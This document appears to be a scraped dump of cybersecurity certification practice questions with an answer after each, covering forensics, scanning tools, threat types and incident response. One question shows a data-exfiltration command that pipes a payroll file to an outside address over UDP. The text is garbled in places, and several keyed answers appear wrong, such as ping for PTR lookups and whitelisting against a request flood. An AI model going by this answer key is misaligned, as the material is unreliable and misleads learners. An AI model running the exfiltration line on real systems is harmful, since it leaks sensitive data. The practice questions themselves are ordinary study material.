Use Netstat.
After reviewing security logs, it is noticed that sensitive data is being transferred over an insecure network. Which of the following would a cybersecurity analyst BEST recommend that the organization implement? Use aVPN Update the data classification matrix. Segment the networks. Use FIM. Use a digital watermark.
Use aVPN
A security analyst received a compromised workstation. The workstations hard drive may contain evidence of criminal activities. Which of the following is the FIRST thing the analyst must do to ensure the integrity of the hard drive while performing the analysis? Make a copy of the hard drive. Use write blockers. Run rm R command to create a hash. Install it on a different machine and explore the content.
Use write blockers.
The development team recently moved a new application into production for the accounting department. After this occurred, the Chief Information Officer (CIO) was contacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporations quarterly tax returns. Which of the following types of testing would help prevent this from reoccurring? Security regression testing User acceptance testing Input validation testing Static code testing
User acceptance testing
The software development team pushed a new web application into production for the accounting department. Shortly after the application was published, the head of the accounting department informed IT operations that the application was not performing as intended. Which of the following SDLC best practices was missed? Peer code reviews Regression testing User acceptance testing Fuzzing Static code analysis
User acceptance testing
A security analyst is creating baseline system images to remediate vulnerabilities found in different operating systems. Each image needs to be scanned before it is deployed. The security analyst must ensure the configurations match industry standard benchmarks and the process can be repeated frequently. Which of the following vulnerability options would BEST create the process requirements? Utilizing an operating system SCAP plugin Utilizing an authorized credential scan Utilizing a non-credential scan Utilizing a known malware plugin
Utilizing an operating system SCAP plugin
Which of the following systems would be at the GREATEST risk of compromise if found to have an open vulnerability associated with perfect forward secrecy? Endpoints VPN concentrators Virtual hosts SIEM Layer 2 switches
VPN concentrators
A cybersecurity analyst is completing an organizations vulnerability report and wants it to reflect assets accurately. Which of the following items should be in the report? Processor utilization Virtual hosts Organizational governance Log disposition Asset isolation
Virtual hosts
A security analysts daily review of system logs and SIEM showed fluctuating patterns of latency. During the analysis, the analyst discovered recent attempts of intrusion related to malware that overwrites the MBR. The facilities manager informed the analyst that a nearby construction project damaged the primary power lines, impacting the analysts support systems. The electric company has temporarily restored power, but the area may experience temporary outages. Which of the following issues the analyst focus on to continue operations? Updating the ACL Conducting backups Virus scanning Additional log analysis
Virus scanning
A threat intelligence analyst who works for a financial services firm received this report: There has been an effective waterhole campaign residing at www.bankfinancecompsoftware.com. This domain is delivering ransomware. This ransomware variant has been called LockMaster by researchers due to its ability to overwrite the MBR, but this term is not a malware signature. Please execute a defensive operation regarding this attack vector. The analyst ran a query and has assessed that this traffic has been seen on the network. Which of the following actions should the analyst do NEXT? (Select TWO). Advise the firewall engineer to implement a block on the domain Visit the domain and begin a threat assessment Produce a threat intelligence message to be disseminated to the company Advise the security architects to enable full-disk encryption to protect the MBR Advise the security analysts to add an alert in the SIEM on the string LockMaster Format the MBR as a precaution
Visit the domain and begin a threat assessment Advise the security architects to enable full-disk encryption to protect the MBR
The computer incident response team at a multinational company has determined that a breach of sensitive data has occurred in which a threat actor has compromised the organizations email system. Per the incident response procedures, this breach requires notifying the board immediately. Which of the following would be the BEST method of communication? Post of the company blog Corporate-hosted encrypted email VoIP phone call Summary sent by certified mail Externally hosted instant message
VoIP phone call
There have been several exploits to critical devices within the network. However, there is currently no process to perform vulnerability analysis. Which of the following should the security analyst implement during production hours to identify critical threats and vulnerabilities? Asset inventory of all critical devices Vulnerability scanning frequency that does not interrupt workflow Daily automated reports of exploited devices Scanning of all types of data regardless of sensitivity levels
Vulnerability scanning frequency that does not interrupt workflow
Which of the following is a vulnerability that is specific to hypervisors? DDoS VLAN hopping Weak encryption WMescape
WMescape
A cybersecurity consultant found common vulnerabilities across the following services used by multiple servers at an organization: VPN, SSH, and HTTPS. Which of the following is the MOST likely reason for the discovered vulnerabilities? Leaked PKI private key Vulnerable version of OpenSSL Common initialization vector Weak level of encryption entropy Vulnerable implementation of PEAP
Weak level of encryption entropy
A recent audit has uncovered several coding errors and a lack of input validation being used on a public portal. Due to the nature of the portal and the severity of the errors, the portal is unable to be patched. Which of the following tools could be used to reduce the risk of being compromised? Web application firewall Network firewall Web proxy Intrusion prevention system
Web application firewall
Which of the following is a technology used to provide Internet access to internal associates without exposing the Internet directly to the associates? Fuzzer Vulnerability scanner Web proxy Intrusion prevention system
Web proxy
A threat intelligence analyst who is working on the SOC floor has been forwarded an email that was sent to one of the executives in business development. The executive mentions the email was from the Chief Executive Officer (CEO), who was requesting an emergency wire transfer. This request was unprecedented. Which of the following threats MOST accurately aligns with this behavior? Phishing Whaling Spam Ransomware
Whaling
A company has recently launched a new billing invoice website for a few key vendors. The cybersecurity analyst is receiving calls that the website is performing slowly and the pages sometimes time out. The analyst notices the website is receiving millions of requests, causing the service to become unavailable. Which of the following can be implemented to maintain the availability of the website? VPN Honeypot Whitelisting DMZ MAC filtering
Whitelisting
Which of the following is a vulnerability when using Windows as a host OS for virtual machines? Windows requires frequent patching. Windows virtualized environments are typically unstable. Windows requires hundreds of open firewall ports to operate. Windows is vulnerable to the ping of death.
Windows is vulnerable to the ping of death.
A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usage, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, despite the fact that no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this? Advanced persistent threat Zero day Trojan Logic bomb
Zero day
A security analyst has noticed that a particular server has consumed over 1TB of bandwidth over the course of the month. It has port 3333 open; however, there have not been any alerts or notices regarding the server or its activities. Which of the following did the analyst discover? APT DDoS Zero day False positive
Zero day
Using a heuristic system to detect an anomaly in a computers baseline, a system administrator was able to detect an attack even though the company signature based IDS and antivirus did not detect it. Further analysis revealed that the attacker had downloaded an executable file onto the company PC from the USB port, and executed it to trigger a privilege escalation flaw. Which of the following attacks has MOST likely occurred? Cookie stealing Zero-day Directory traversal XML injection
Zero-day
An analyst is observing unusual network traffic from a workstation. The workstation is communicating with a known malicious site over an encrypted tunnel. A full antivirus scan with an updated antivirus signature file does not show any sign of infection. Which of the following has occurred on the workstation? Zero-day attack Known malware attack Session hijack Cookie stealing
Zero-day attack
An HR employee began having issues with a device becoming unresponsive after attempting to open an email attachment. When informed, the security analyst became suspicious of the situation, even though there was not any unusual behavior on the IDS or any alerts from the antivirus software. Which of the following BEST describes the type of threat in this situation? Packet of death Zero-day malware PII exfiltration Known virus
Zero-day malware
After analyzing and correlating activity from multiple sensors, the security analyst has determined a group from a high-risk country is responsible for a sophisticated breach of the company network and continuous administration of targeted attacks for the past three months. Until now, the attacks went unnoticed. This is an example of: privilege escalation. advanced persistent threat. malicious insider threat. spear phishing.
advanced persistent threat.
While reviewing firewall logs, a security analyst at a military contractor notices a sharp rise in activity from a foreign domain known to have well-funded groups that specifically target the companys R&D department. Historical data reveals other corporate assets were previously targeted. This evidence MOST likely describes: an APT. DNS harvesting. a zero-day exploit. corporate espionage.
an APT.
A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention? nmap A sV 192.168.1.235 cat payroll.csv > /dev/udp/123.456.123.456/53 cat/etc/passwd mysql h 192.168.1.235 u test -p
cat payroll.csv >
During an investigation, an incident responder intends to recover multiple pieces of digital media. Before removing the media, the responder should initiate: malware scans. secure communications. chain of custody forms. decryption tools.
chain of custody forms.
Which of the following commands would a security analyst use to make a copy of an image for forensics use? dd wget touch rm
dd
The primary difference in concern between remediating identified vulnerabilities found in general-purpose IT network servers and that of SCADA systems is that: change and configuration management processes do not address SCADA systems. doing so has a greater chance of causing operational impact in SCADA systems. SCADA systems cannot be rebooted to have changes to take effect. patch installation on SCADA systems cannot be verified.
doing so has a greater chance of causing operational impact in SCADA systems.
A security analyst received an email with the following key: Xj3XJ3LLc A second security analyst received an email with following key: 3XJ3xjcLLC The security manager has informed the two analysts that the email they received is a key that allows access to the companys financial segment for maintenance. This is an example of: dual control private key encryption separation of duties public key encryption two-factor authentication
dual control
A common mobile device vulnerability has made unauthorized modifications to a device. The device owner removes the vendor/carrier provided limitations on the mobile device. This is also known as: jailbreaking. cracking. hashing. fuzzing.
jailbreaking.
A security engineer has been asked to reduce the attack surface on an organizations production environment. To limit access, direct VPN access to all systems must be terminated, and users must utilize multifactor authentication to access a constrained VPN connection and then pivot to other production systems form a bastion host. The MOST appropriate way to implement the stated requirement is through the use of a: sinkhole. multitenant platform. single-tenant platform. jump box
jump box
Which of the following command line utilities would an analyst use on an end-user PC to determine the ports it is listening on? tracert ping nslookup netstat
netstat
A cybersecurity analyst was asked to discover the hardware address of 30 networked assets. From a command line, which of the following tools would be used to provide ARP scanning and reflects the MOST efficient method for accomplishing the task? nmap tracert ping a nslookup
nmap
An analyst is detecting Linux machines on a Windows network. Which of the following tools should be used to detect a computer operating system? whois netstat nmap nslookup
nmap
An analyst wants to use a command line tool to identify open ports and running services on a host along with the application that is associated with those services and port. Which of the following should the analyst use? Wireshark Qualys netstat nmap ping
nmap
A company requests a security assessment of its network. Permission is given, but no details are provided. It is discovered that the company has a web presence, and the companys IP address is 70.182.11.4. Which of the following Nmap commands would reveal common open ports and their versions? nmap - oV nmap -vO nmap -sv
nmap -sv
A cybersecurity professional wants to determine if a web server is running on a remote host with the IP address 192.168.1.100. Which of the following can be used to perform this task? nc 192.168.1.100 -1 80 ps aux 192.168.1.100 nmap 192.168.1.100 p 80 A dig www 192.168.1.100 ping p 80 192.168.1.100
nmap 192.168.1.100 p 80 A
A project lead is reviewing the statement of work for an upcoming project that is focused on identifying potential weaknesses in the organizations internal and external network infrastructure. As part of the project, a team of external contractors will attempt to employ various attacks against the organization. The statement of work specifically addresses the utilization of an automated tool to probe network resources in an attempt to develop logical diagrams indication weaknesses in the infrastructure. The scope of activity as described in the statement of work is an example of: session hijacking vulnerability scanning social engineering penetration testing friendly DoS
penetration testing
Which of the following utilities could be used to resolve an IP address to a domain name, assuming the address has a PTR record? ifconfig ping arp nbtstat
ping
In comparison to non-industrial IT vendors, ICS equipment vendors generally: rely less on proprietary code in their hardware products. have more mature software development models. release software updates less frequently. provide more expensive vulnerability reporting.
rely less on proprietary code in their hardware products.
While preparing for a third-party audit, the vice president of risk management and the vice president of information technology have stipulated that the vendor may not use offensive software during the audit. This is an example of: organizational control. service-level agreement. rules of engagement. risk appetite
rules of engagement.
Creating an isolated environment in order to test and observe the behavior of unknown software is also known as: sniffing hardening hashing sandboxing
sandboxing
Which of the following tools should a cybersecurity analyst use to verify the integrity of a forensic image before and after an investigation? strings sha1sum file dd gzip
sha1sum
